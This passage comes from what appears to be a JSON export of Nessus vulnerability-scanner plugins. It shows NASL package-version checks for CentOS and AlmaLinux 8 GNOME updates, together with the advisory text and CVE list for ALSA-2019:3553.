'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-archive-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-client-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-client-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-devel-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-devel-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-fuse-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-fuse-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-goa-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-goa-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-gphoto2-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-gphoto2-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-mtp-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-mtp-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-smb-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-smb-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mozjs60-60.9.0-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mozjs60-60.9.0-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mozjs60-devel-60.9.0-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mozjs60-devel-60.9.0-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mutter-3.32.2-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mutter-3.32.2-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mutter-devel-3.32.2-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mutter-devel-3.32.2-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'nautilus-3.28.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'nautilus-3.28.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'nautilus-devel-3.28.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'nautilus-devel-3.28.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'nautilus-extensions-3.28.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'nautilus-extensions-3.28.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-1.42.4-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-1.42.4-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-devel-1.42.4-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-devel-1.42.4-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-devel-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-devel-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-core-libs-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-core-libs-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-graphics-libs-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-graphics-libs-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-fade-throbber-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-fade-throbber-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-label-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-label-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-script-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-script-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-space-flares-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-space-flares-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-throbgress-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-throbgress-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-two-step-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-plugin-two-step-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-scripts-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-scripts-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-system-theme-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-system-theme-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-charge-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-charge-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-fade-in-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-fade-in-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-script-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-script-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-solar-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-solar-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-spinfinity-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-spinfinity-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-spinner-0.9.3-15.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'plymouth-theme-spinner-0.9.3-15.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'SDL-1.2.15-35.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'SDL-1.2.15-35.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'SDL-devel-1.2.15-35.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'SDL-devel-1.2.15-35.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'wayland-protocols-devel-1.17-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'wayland-protocols-devel-1.17-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.24.3-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.24.3-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.24.3-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.24.3-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.24.3-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.24.3-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.24.3-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.24.3-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-plugin-process-gtk2-2.24.3-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-plugin-process-gtk2-2.24.3-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'SDL / SDL-devel / accountsservice / accountsservice-devel / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:42:03", "description": "The remote AlmaLinux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ALSA-2019:3553 advisory.\n\n - It was discovered that the gnome-shell lock screen since version 3.15.91 did not properly restrict all contextual actions. An attacker with physical access to a locked workstation could invoke certain keyboard shortcuts, and potentially other actions. (CVE-2019-3820)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8571, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8679, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8672, CVE-2019-8676, CVE-2019-8689)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8726, CVE-2019-8735)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to uninitialized memory use when processing certain TIFF image files. (CVE-2019-11459)\n\n - daemon/gvfsdaemon.c in gvfsd from GNOME gvfs before 1.38.3, 1.40.x before 1.40.2, and 1.41.x before 1.41.3 opened a private D-Bus server socket without configuring an authorization rule. A local attacker could connect to this server socket and issue D-Bus method calls. (Note that the server socket only accepts a single connection, so the attacker would have to discover the server and connect to the socket before its owner does.) (CVE-2019-12795)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : GNOME (ALSA-2019:3553)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8383", "CVE-2019-11070", "CVE-2019-11459", "CVE-2019-12795", "CVE-2019-3820", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:alma:linux:gdk-pixbuf2", "p-cpe:/a:alma:linux:gdk-pixbuf2-devel", "p-cpe:/a:alma:linux:gdk-pixbuf2-modules", "p-cpe:/a:alma:linux:gdk-pixbuf2-xlib", "p-cpe:/a:alma:linux:gdk-pixbuf2-xlib-devel", "p-cpe:/a:alma:linux:gnome-desktop3", "p-cpe:/a:alma:linux:gnome-desktop3-devel", "p-cpe:/a:alma:linux:libpurple", "p-cpe:/a:alma:linux:libpurple-devel", "p-cpe:/a:alma:linux:pidgin", "p-cpe:/a:alma:linux:pidgin-devel", "cpe:/o:alma:linux:8"], "id": "ALMA_LINUX_ALSA-2019-3553.NASL", "href": "https://www.tenable.com/plugins/nessus/157524", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2019:3553.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157524);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2019-3820\",\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8518\",\n \"CVE-2019-8523\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8666\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8679\",\n \"CVE-2019-8681\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8726\",\n \"CVE-2019-8735\",\n \"CVE-2019-8768\",\n \"CVE-2019-11070\",\n \"CVE-2019-11459\",\n \"CVE-2019-12795\"\n );\n script_xref(name:\"ALSA\", value:\"2019:3553\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"AlmaLinux 8 : GNOME (ALSA-2019:3553)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nALSA-2019:3553 advisory.\n\n - It was discovered that the gnome-shell lock screen since version 3.15.91 did not properly restrict all\n contextual actions. An attacker with physical access to a locked workstation could invoke certain keyboard\n shortcuts, and potentially other actions. (CVE-2019-3820)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237,\n CVE-2019-8571, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain\n JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted\n URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS\n 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558,\n CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2,\n tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may\n lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for\n Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13,\n iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8679, CVE-2019-8681, CVE-2019-8686,\n CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for\n Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8672, CVE-2019-8676, CVE-2019-8689)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state\n management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for\n Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8726, CVE-2019-8735)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history\n items. (CVE-2019-8768)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings\n when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in\n GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to\n uninitialized memory use when processing certain TIFF image files. (CVE-2019-11459)\n\n - daemon/gvfsdaemon.c in gvfsd from GNOME gvfs before 1.38.3, 1.40.x before 1.40.2, and 1.41.x before 1.41.3\n opened a private D-Bus server socket without configuring an authorization rule. A local attacker could\n connect to this server socket and issue D-Bus method calls. (Note that the server socket only accepts a\n single connection, so the attacker would have to discover the server and connect to the socket before its\n owner does.) (CVE-2019-12795)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2019-3553.html\");\n 